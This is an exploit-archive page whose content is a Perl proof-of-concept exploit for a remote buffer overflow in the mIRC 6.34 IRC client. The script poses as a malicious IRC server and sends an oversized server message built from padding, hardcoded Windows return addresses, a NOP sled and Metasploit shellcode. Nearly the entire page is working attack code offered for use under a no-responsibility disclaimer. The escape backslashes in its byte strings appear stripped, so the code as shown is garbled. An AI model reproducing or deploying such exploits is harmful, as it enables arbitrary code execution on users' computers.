[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : mIRC 6.34 Remote Buffer Overflow Exploit
# Published : 2008-10-04
# Author : SkD
# Previous Title : Hammer Software MetaGauge 1.0.0.17 Directory Traversal Vulnerability
# Next Title : Serv-U <= 7.3 Remote FTP File Replacement Vulnerability (auth)
#!/usr/bin/perl
#
#
# mIRC 6.34 Remote Buffer Overflow Exploit
# Exploit by SkD (skdrat <at> hotmail <.> com)
# ----------------------------------------
# A day's work of debugging and looking at mIRC.
#
# Tested on Windows XP SP3 English and Windows Vista SP0.
#
# Credits to securfrog for publishing the PoC.
#
# Author has no responsibility over the damage you do with this!
#
# Note: You might change the addresses for Vista ;)
#
# ----------------------------------------
use IO::Socket;
if(!($ARGV[1]))
{
print "n[x] mIRC 6.34 Remote Buffer Overflow Exploitn";
print "[x] Exploit by SkD (skdrat@ hotmail.com)nn";
print "[x] Use: mirc_exp.pl <port> <OS = 1 for XP Sp3 AND 2 for Vista SP0>n[x] Example: mirc_exp.pl 6667 0nn";
exit;
}
while(1)
{
my $sock=new IO::Socket::INET (
Listen => 1,
LocalAddr => '127.0.0.1',
LocalPort => $ARGV[0],
Proto => 'tcp');
die unless $sock;
# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
my $shellcode =
"x2bxc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x1e".
"x95x97xf1x83xebxfcxe2xf4xe2x7dxd3xf1x1ex95x1cxb4".
"x22x1exebxf4x66x94x78x7ax51x8dx1cxaex3ex94x7cxb8".
"x95xa1x1cxf0xf0xa4x57x68xb2x11x57x85x19x54x5dxfc".
"x1fx57x7cx05x25xc1xb3xf5x6bx70x1cxaex3ax94x7cx97".
"x95x99xdcx7ax41x89x96x1ax95x89x1cxf0xf5x1cxcbxd5".
"x1ax56xa6x31x7ax1exd7xc1x9bx55xefxfdx95xd5x9bx7a".
"x6ex89x3ax7ax76x9dx7cxf8x95x15x27xf1x1ex95x1cx99".
"x22xcaxa6x07x7exc3x1ex09x9dx55xecxa1x76x65x1dxf5".
"x41xfdx0fx0fx94x9bxc0x0exf9xf6xf6x9dx7dx95x97xf1";
print "[x] Listening on port ".$ARGV[0]."..rn";
$s=$sock->accept();
print "[x] Got a user!rn";
$overflow = "x41" x 307;
$overflow2 = "B" x 12;
$eip_vista = "x66x1cxc2x76"; #Normaliz.DLL pop pop ret
$eip2_vista = "xd3xdbx54x77"; #MSFCT.DLL jmp esp
$eip_xpsp3 = "xd1xfbx92x77"; #SETUPAPI.DLL 0x7792FBD1 pop eax pop ret
$eip2_xpsp3 = "xb7x87x9dx77"; #SETUPAPI.DLL 0x779D87B7 jmp esp
$addr = "xb5xb5xfdx7f";
$nop_sled = "x90" x 4;
$jmp = "xEBx03xFFxFF";
print "[x] Sending packets..rn";
print $s ":my_irc_server.com 001 wow :Welcome to the Internet Relay Network wowrn";
sleep(1);
if($ARGV[1] == "1"){
print $s ":".$overflow.$eip_xpsp3.$addr.$nop_sled.$eip2_xpsp3.$nop_sled.$overflow2.$jmp.$nop_sled.$shellcode.$nop_sled." PRIVMSG wow : /FINGER wow.rn";
}else{
print $s ":".$overflow.$eip_vista.$addr.$nop_sled.$eip2_vista.$nop_sled.$overflow2.$jmp.$nop_sled.$shellcode.$nop_sled." PRIVMSG wow : /FINGER wow.rn";
}
print "[x] Check it out!rn";
}
# www.Syue.com [2008-10-04]